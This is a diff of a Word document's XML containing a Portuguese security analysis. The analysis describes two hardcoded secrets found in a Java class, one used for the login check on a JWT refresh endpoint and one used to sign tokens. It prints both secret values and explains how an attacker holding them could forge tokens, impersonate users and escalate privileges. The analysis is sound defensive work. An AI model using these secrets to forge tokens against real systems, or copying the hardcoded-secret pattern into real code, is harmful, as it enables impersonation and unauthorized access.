+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Segundo o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>site</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId14" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:lang w:val="pt-PT"/>
+          </w:rPr>
+          <w:t>https://jwt.io</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>, JWT é uma norma (RFC 7519) que define uma forma compacta e segura para transmitir informação através de um objeto JSON. Esta informação é segura e confiável porque é assinada digitalmente através de um segredo comum ou através de chaves públicas/privadas através de RSA ou ECDSA.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Nesta classe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, é possível encontrar duas </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>hardcoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> passwords</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">public static final String </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>PASSWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "bm5nhSkxCXZkKRy4</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>";</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">private static final String </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>JWT_PASSWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = "bm5n3SkxCX4kKRy4</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>";</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">constante </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>PASSWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> é utilizada no método </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>follow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>endpoint</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> JWT/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>refresh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/login) para verificar se a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> enviada pelo utilizador é igual.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A constante </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>JWT_PASSWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> é utilizada no método </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>createNewTokens</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, utilizado no método </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>follow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, para assinar o novo </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> criado. Enquanto nos métodos </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>checkout</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>endpoint</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> JWT/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>refresh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/checkout) e </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>newToken</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>endpoint</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /JWT/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>refresh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/checkout) para verificar a assinatura digital enviada no </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do utilizador.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Através desta assinatura digital do usada no JTW é possível garantir que apenas os pedidos enviados para estes </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>endpoints</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> por utilizadores autorizados são aceites (autenticação). Garante também a não-repúdio pois o utilizador não poderá dizer que não foi ele que enviou o pedido.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Se um utilizador malicioso descobrir este segredo (A.4.c), poderá enviar pedidos validos para estes </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>endpoints</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, fazendo se passar por outros utilizadores e podendo até escalar os seus privilégios. Se este segredo for usado também noutros serviços, mesmo não estando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>hardcoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>, ele poderá também explorá-los para o seu proveito.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
+      <w:headerReference w:type="default" r:id="rId15"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -2746,19 +5795,118 @@
 </w:document>
 </file>
 
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
+<file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" 